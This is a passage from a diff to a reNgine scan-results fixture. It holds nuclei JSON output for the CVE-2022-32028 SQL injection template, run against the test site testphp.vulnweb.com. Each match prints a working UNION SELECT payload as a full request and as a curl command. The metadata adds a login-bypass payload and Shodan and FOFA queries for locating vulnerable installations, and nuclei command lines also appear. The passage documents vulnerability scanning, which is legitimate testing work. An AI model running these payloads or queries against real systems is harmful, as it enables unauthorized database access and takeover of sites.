Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\",\"verified\":true,\"max-request\":2},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0 Safari/600.1.25\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:05 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003e\\u003cimg src='/Mod_Rewrite_Shop/images/1.jpg'\\u003e\\u003cb\\u003ec8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e4\\u003cbr\\u003e\\u003ca href='/Mod_Rewrite_Shop/BuyProduct-1/'\\u003eBuy\\u003c/a\\u003e\\u0026nbsp;\\u003ca href='/Mod_Rewrite_Shop/RateProduct-1.html'\\u003eRate\\u003c/a\\u003e\\u003c/div\\u003e\\u003chr\\u003e\\u003ca href='/Mod_Rewrite_Shop/'\\u003eBack\\u003c/a\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:05.896519282Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0 Safari/600.1.25' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\",\"verified\":true,\"max-request\":2,\"vendor\":\"car_rental_management_system_project\"},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:05 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:05.899962792Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"verified\":true,\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\"},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:50.0) Gecko/20100101 Firefox/50.0\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:05 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003e\\u003cimg src='/Mod_Rewrite_Shop/images/1.jpg'\\u003e\\u003cb\\u003ec8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e4\\u003cbr\\u003e\\u003ca href='/Mod_Rewrite_Shop/BuyProduct-1/'\\u003eBuy\\u003c/a\\u003e\\u0026nbsp;\\u003ca href='/Mod_Rewrite_Shop/RateProduct-1.html'\\u003eRate\\u003c/a\\u003e\\u003c/div\\u003e\\u003chr\\u003e\\u003ca href='/Mod_Rewrite_Shop/'\\u003eBack\\u003c/a\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:05.935171996Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:50.0) Gecko/20100101 Firefox/50.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\",\"verified\":true},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:05 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:05.94422472Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\",\"verified\":true},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:07 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003e\\u003cimg src='/Mod_Rewrite_Shop/images/1.jpg'\\u003e\\u003cb\\u003ec8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e4\\u003cbr\\u003e\\u003ca href='/Mod_Rewrite_Shop/BuyProduct-1/'\\u003eBuy\\u003c/a\\u003e\\u0026nbsp;\\u003ca href='/Mod_Rewrite_Shop/RateProduct-1.html'\\u003eRate\\u003c/a\\u003e\\u003c/div\\u003e\\u003chr\\u003e\\u003ca href='/Mod_Rewrite_Shop/'\\u003eBack\\u003c/a\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:07.906585848Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"verified\":true,\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\"},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.4.24\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:07 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:07.961397579Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.4.24' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"verified\":true,\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\"},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.183\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:07 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:07.966200436Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.183' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n", + "time": "2024-11-13T02:34:18.933Z" } }, { - "model": "startScan.dork", - "pk": 5, + "model": "startScan.command", + "pk": 104, "fields": { - "type": "login_pages", - "url": "http://testhtml5.vulnweb.com/" + "scan_history": 1, + "activity": 15, + "command": "nuclei -j -irr -l /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_unfurled.txt -c 50 -retries 1 -rl 150 -timeout 5 -silent -t /home/rengine/nuclei-templates -severity medium", + "return_code": 0, + "output": null, + "time": "2024-11-13T02:34:18.951Z" } }, { - "model": "startScan.dork", - "pk": 6, + "model": "startScan.command", + "pk": 105, "fields": { - "type": "login_pages", - "url": "http://testphp.vulnweb.com/" + "scan_history": 1, + "activity": 16, + "command": "nuclei -j -irr -l /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_unfurled.txt -c 50 -retries 1 -rl 150 -timeout 5 -silent -t /home/rengine/nuclei-templates -severity critical", + "return_code": 0, + "output": null, + "time": "2024-11-13T02:34:18.992Z" } }, { - "model": "startScan.dork", - "pk": 7, + "model": "startScan.command", + "pk": 106, "fields": { - "type": "login_pages", - "url": 